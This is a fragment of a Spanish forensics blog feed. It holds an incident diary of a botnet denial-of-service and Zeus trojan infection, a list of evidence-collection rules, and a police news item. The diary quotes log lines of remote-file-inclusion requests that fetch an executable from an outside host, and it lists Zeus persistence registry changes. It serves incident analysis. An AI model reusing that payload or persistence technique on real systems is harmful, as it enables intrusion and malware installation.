href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TA5gtgJv1WI/AAAAAAAAB4o/wnFcntp09Fw/s1600/graph_image2.php.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="116" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TA5gtgJv1WI/AAAAAAAAB4o/wnFcntp09Fw/s320/graph_image2.php.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Es decir, parece que además del número excesivo de conexiones, hay algo desbocado.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;10:00h&lt;/b&gt;.-&amp;nbsp; Conseguimos hacer un netstat a la máquina y esta devuelve la sorprendente lista de más de 75.000 conexiones al servidor web, tras direccionarlo a fichero (mas comodo para trabajar) vemos que la mayoria de direcciones viene del rango 222.73.68.X y que la ip 222.73.68.23 es la que más conexiones activas tiene. Tiene pinta de una botnet&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/TBCrPdWHPfI/AAAAAAAAB5Q/1baXXkbkigY/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/TBCrPdWHPfI/AAAAAAAAB5Q/1baXXkbkigY/s320/Captura.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Si lo intentamos Geolocalizar vemos que casi todas y especialmente estas son de China &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TBCsjGC-epI/AAAAAAAAB5Y/oy3Jv6I4ixc/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="165" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TBCsjGC-epI/AAAAAAAAB5Y/oy3Jv6I4ixc/s400/Captura.JPG" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Vamos a grabar el tráfico de red, utilizando TCPDUMP, para posteriormente análizar el mismo.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;10:10h&lt;/b&gt;.- Vemos el log de apache, esto es importante, despues de un buen rato me choca las líneas que se repiten, especialmente esta:&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;222.73.68.23/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;222.73.68.24/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;222.73.68.99/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt; &lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Abro mi máquina virtual y desde el navegador introduzco la URL que me redirecciona al dominio 'asf.wdn.com', que ha su vez me regala un caramelito que más tarde será objeto de estudio&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TA-g0THCwFI/AAAAAAAAB5I/J3JRNMsYbBM/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="252" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TA-g0THCwFI/AAAAAAAAB5I/J3JRNMsYbBM/s400/Captura.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt; &lt;/b&gt;&lt;br /&gt;&lt;b&gt; &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;NOTA: Cuidadin que está todavia activa y te descarga algo&lt;/b&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;b&gt;10:11h.- &lt;/b&gt;Cerramos en el cortafuegos todo el rango posible de la red 222. El servidor empieza a tener mejorias y el servicio se restablece.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;10:20h.-&lt;/b&gt; Se decide por parte de los responsables cerrar el mayor rango posible de IP's de Asia.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;11:00h.- &lt;/b&gt;Se cierra el caso y el servidor funciona perfectamente.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;12:00h&lt;/b&gt;.- Me he llevado el EXE de la página web maliciosa y el tráfico en formato PCAP &lt;br /&gt;&lt;br /&gt;&lt;b&gt;13:20h.&lt;/b&gt;- Vamos a revisar el fichero del TCPDUMP con Whireshark. Tras un rato veo lo siguiente. &lt;i&gt;&lt;b&gt;Rh/cath/bin..Rhsswdh//pah/etc&lt;/b&gt;&lt;/i&gt;, todo apunta que además de las conexiones están mandando algo al servidor web&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TBCv_MdHxXI/AAAAAAAAB5g/C8IwYKeZjTg/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="198" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TBCv_MdHxXI/AAAAAAAAB5g/C8IwYKeZjTg/s320/Captura.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TBCyQbOdhnI/AAAAAAAAB5o/b6LOb9uAaYQ/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TBCyQbOdhnI/AAAAAAAAB5o/b6LOb9uAaYQ/s320/Captura.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Tiene pinta de lo que es, un Shellcode, vamos a intentar guardar esa porción de código y proceder a su desemsablado&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TBC0BPqzSkI/AAAAAAAAB5w/XFcpSeD8LgY/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TBC0BPqzSkI/AAAAAAAAB5w/XFcpSeD8LgY/s320/Captura.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;Y ahora que ya lo tenemos vamos a compilarlo y lanzarlo en un entorno controlado.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/TBC0qHKsdpI/AAAAAAAAB54/gtZYm4yTYoA/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/TBC0qHKsdpI/AAAAAAAAB54/gtZYm4yTYoA/s320/Captura.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp;Bueno, pues todo apunta a un exploit remoto que en aparencia devuelve el contenido del fichero passwd.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;AHORA A POR EL EJECUTABLE&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Vamos a lanzar en una máquina virtual (sin actualizaciones) windows xp con IE 6.0 y corriendo Process Monitor de Sysinternals y una utilidad que me ha venido muy bien en alguna ocasión que se llama SpyMonitor y que sirve para monitorizar los cambios y ver a posteriori las diferencias.&lt;br /&gt;&lt;br /&gt;Estos son los resultados:&lt;br /&gt;&lt;br /&gt;Con privilegio de administrador se han creado los siguientes ficheros&lt;br /&gt;&lt;blockquote style="color: #444444;"&gt;&lt;i&gt;&lt;b&gt;%systemroot%\system32\sdra64.exe&amp;nbsp; &lt;br /&gt;%systemroot%\system32\lowsec&lt;br /&gt;%systemroot%\system32\lowsec\user.ds&lt;br /&gt;%systemroot%\system32\lowsec\user.ds.lll&amp;nbsp; &lt;br /&gt;%systemroot%\system32\lowsec\local.ds&amp;nbsp;&lt;/b&gt;&lt;/i&gt; &lt;/blockquote&gt;&lt;blockquote&gt;&lt;/blockquote&gt;Sin ser administradores:&lt;br /&gt;&lt;blockquote style="color: #444444;"&gt;&lt;i&gt;&lt;b&gt;%appdata%\sdra64.exe&lt;br /&gt;%appdata%\lowsec&lt;br /&gt;%appdata%\lowsec\user.ds&lt;br /&gt;%appdata%\lowsec\user.ds.lll&lt;br /&gt;%appdata%\lowsec\local.ds&lt;/b&gt;&lt;/i&gt;&lt;/blockquote&gt;Cambios que se han realizado en el registro:&lt;br /&gt;&lt;blockquote&gt;&lt;b&gt;&lt;i style="color: #444444;"&gt;HKLM\Software\Microsoft\Windows  NT\CurrentVersion\Winlogon&lt;/i&gt;&lt;/b&gt;&lt;/blockquote&gt;En la clave 'userinit' &lt;br /&gt;&lt;blockquote&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: #444444;"&gt;"Userinit"&amp;nbsp;  = "C:\WINDOWS\system32\userinit.exe&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/blockquote&gt;Por esta nueva: &lt;br /&gt;&lt;blockquote&gt;&lt;i style="color: #444444;"&gt;&lt;b&gt;"Userinit" =   "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe"&lt;/b&gt;&lt;/i&gt;&lt;/blockquote&gt;Sin ser administradores&lt;br /&gt;&lt;blockquote&gt;&lt;i style="color: #444444;"&gt;&lt;b&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/b&gt;&lt;/i&gt;&lt;/blockquote&gt;En la clave 'userinit' &lt;br /&gt;&lt;blockquote&gt;&lt;i style="color: #444444;"&gt;&lt;b&gt;"Userinit" = "C:\Documents and   Settings\%;user%;\Application Data\sdra64.exe"&lt;/b&gt;&lt;/i&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/TBC_vX2DhuI/AAAAAAAAB6A/K-tSflfw43k/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="53" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/TBC_vX2DhuI/AAAAAAAAB6A/K-tSflfw43k/s400/Captura.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Googleando y por lo que dicen en los foros, todo apunta a una variante del ya famoso troyano ZEUS y para poner la puntilla he búscado la IP atacante en Zeus Tracker. Zeus Tracker &lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;proporciona la posibilidad para realizar un  seguimiento de ZeuS (servidores, paneles de control) y los host  maliciosos que albergan los archivos de Zeus.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;Y aquí tenemos nuestra IP Zombi&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TBDCry1ej0I/AAAAAAAAB6I/JxBumy-Wz4E/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TBDCry1ej0I/AAAAAAAAB6I/JxBumy-Wz4E/s320/Captura.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt; &lt;/span&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Muy, muy curioso...Seguiremos investigando&lt;br /&gt;&lt;br /&gt;Quiero agradecer la ayuda a Eduardo Abril, que me ha ayudado en el desemsablado del shellcode&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-1858071773234302197?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/1858071773234302197/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=1858071773234302197' title='13 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1858071773234302197'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1858071773234302197'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/06/que-vienen-los-zombis-historia-de-una.html' title='¡¡ Que vienen los Zombis !!  (Historia de una denegación de servicio)'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_7dOLVYBL8vA/TBDyDlTkJ_I/AAAAAAAAB6Q/EQtXXLgeepc/s72-c/Captura.JPG' height='72' width='72'/><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-5189885599572093221</id><published>2010-05-26T05:55:00.001+02:00</published><updated>2010-05-26T05:56:15.905+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Normativa'/><title type='text'>Recolección de evidencias (Parte I)</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/S_vw-31GD3I/AAAAAAAABq4/JJ4WccOqcxw/s1600/2009-03-21_IMG_2009-03-14_01.15.22__812013.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/S_vw-31GD3I/AAAAAAAABq4/JJ4WccOqcxw/s200/2009-03-21_IMG_2009-03-14_01.15.22__812013.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span title=""&gt;Hola lectores,&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title=""&gt;Muchos sois los que llevais pidiendo información de que métodos son los empleados para la recolección de evidencias.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title=""&gt;Voy a tratar de poner en dos post más o menos los pasos que sigo para&amp;nbsp; que de alguna forma sea valido ante el juez, el primer post trata de la parte física y el segundo de un pequeño cuestionario que es interesante cuando no se obtiene toda la información o es parcial.&lt;/span&gt;&lt;br /&gt;&lt;span title=""&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title=""&gt;Aquí os dejo mis reglas de oro que hasta ahora son admitidas por los juzgados&lt;br /&gt;&lt;br /&gt;&lt;b&gt;EQUIPOS&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;Realizar una  sesión fotográfica de la sala  antes de comenzar la tarea, la entrada y distintas salidas (si las  hubiera) como por ejemplo ventanas&lt;/span&gt;&lt;/span&gt;. Las fotos deben de  tener sobreimpresa digitalmente la fecha y hora.&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;Fotografíe el ordenador de frente con los &lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;cables y por  detrás, así como &lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;dispositivos  conectados tal y como se encuentran. Haga más de una foto si es preciso&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;No utilice el  ordenador ni intente &lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;buscar pruebas.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt; Si el equipo  está "apagado", no "encender".&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Si el equipo  está "encendido" y se muestran los mensajes en el monitor, realizar una  fotografía de la &lt;/span&gt;&lt;span title=""&gt;pantalla.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;Si el equipo está  "encendido" y la pantalla está en  blanco, mueva el ratón o la barra de espacio&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt; (esto mostrará  la imagen activa en la pantalla). &lt;/span&gt;&lt;span title=""&gt;Realice a continuación la fotografía.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;Desconecte  la fuente de alimentación del router.&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;Desconecte el  cable de alimentación de la parte posterior del equipo (No hacer un apagado ordenado)&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Realice un  diagrama si es una red y empiece a crear las etiquetas (ver mi  etiquetadora profesional) de los &lt;/span&gt;&lt;span title=""&gt;dispositivos  conectados.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;span title=""&gt;Desconecte todos  los demás cables y los dispositivos del equipo&lt;/span&gt;&lt;span title=""&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;span title=""&gt;Tenga preparada bolsas etiquetadas o en su defectos paquetes  para el transporte de los dispositivos&lt;/span&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Haga lo mismo  con los dispositivos extraibles (pendrives)&lt;/span&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;span title=""&gt;&amp;nbsp;Mantenga todos los medios de comunicación, incluido el  equipo, lejos de los imanes, radio&lt;/span&gt;&lt;span title=""&gt;transmisores  y otros elementos potencialmente dañinos.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;span title=""&gt;Recopile  manuales de instrucciones, documentación y posible notas que hubiera en  el lugar (es recomendable proceder a su etiquetado).&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Documentar  todos los pasos implicados en la adquisición del ordenador y sus  componentes.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;Mi etiquetadora:&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/S_vu1wbuMwI/AAAAAAAABqw/sUSMZQ0ODtI/s1600/IMG_0402.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/S_vu1wbuMwI/AAAAAAAABqw/sUSMZQ0ODtI/s200/IMG_0402.JPG" width="150" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;    &lt;b&gt;DISPOSITIVOS MOVILES&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;Si el  dispositivo está apagado "no" encender ".&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Con una PDA o  teléfonos móviles, si el dispositivo &lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;está encendido,  NO LO APAGUE. Si se&lt;/span&gt;&lt;span title=""&gt; apaga &lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;el dispositivo  podría habilitar el password de inicio, por lo tanto &lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;impediría el  acceso a las pruebas.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Fotografíe el dispositivo y la pantalla&lt;/span&gt;&lt;span title=""&gt; (si está disponible).&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Etiquetar y  recoger todos los cables (&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;incluyendo la fuente de alimentación) &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Intentar que el  dispositivo mantenga la batería en la medida de lo posible&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Etiquete el  almacenamiento adicional de los dispositivos&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt; (Sticks de  memoria, compact flash, etc).&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;Documentar  todos los pasos implicados en la adquisición del móvil y sus  componentes.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-5189885599572093221?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/5189885599572093221/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=5189885599572093221' title='8 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/5189885599572093221'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/5189885599572093221'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/05/recoleccion-de-evidencias-parte-i.html' title='Recolección de evidencias (Parte I)'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_7dOLVYBL8vA/S_vw-31GD3I/AAAAAAAABq4/JJ4WccOqcxw/s72-c/2009-03-21_IMG_2009-03-14_01.15.22__812013.jpg' height='72' width='72'/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-5379364157594959203</id><published>2010-05-25T16:42:00.001+02:00</published><updated>2010-05-25T16:43:13.814+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Detenidas 25 personas e imputadas otras 21 por difundir Pornografía Infantil a través de la red Ares.</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/S_vho2LdyTI/AAAAAAAABqo/joqZ3I8cwPA/s1600/Captura.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/S_vho2LdyTI/AAAAAAAABqo/joqZ3I8cwPA/s200/Captura.JPG" width="189" /&gt;&lt;/a&gt;&lt;/div&gt;Este Grupo de Delitos Telemáticos de la Unidad Central Operativa de la  Guardia Civil, en el marco de la operación “MERCADILLO”, desarrollada en  varias comunidades autónomas, ha procedido a la detención de 25  personas e imputación de otras 21, por facilitar la distribución de  archivos de contenido pedófilo a través de la red P2P ARES.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Durante la operación se han efectuado un total de 49 registros  domiciliarios en los que se han intervenido numerosos dispositivos  informáticos con contenido pedófilo.&lt;br /&gt;&lt;br /&gt;Para llevar a cabo dicha búsqueda, los agentes se han valido de la nueva  versión del buscador denominado “NAUTILUS” desarrollado por el Grupo de  Delitos Telemáticos, cuyo objetivo es la detección del intercambio de  material pedófilo a través de la red P2P ARES.&lt;br /&gt;&lt;br /&gt;La selección de objetivos de entre todos los usuarios identificados por  compartir alguno de los videos de pornografía infantil, se ha realizado  siguiendo criterios jurisprudenciales que establecen un mínimo de  ficheros pedófilos compartidos, para evitar conductas ocasionales o  accidentales.&lt;br /&gt;&lt;br /&gt;VISTO EN: &lt;a href="https://www.gdt.guardiacivil.es/webgdt/"&gt;&lt;b&gt;&lt;span style="color: #0b5394;"&gt;La web de la Guardia Civil&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-5379364157594959203?l=conexioninversa.blogspot.com' alt='' 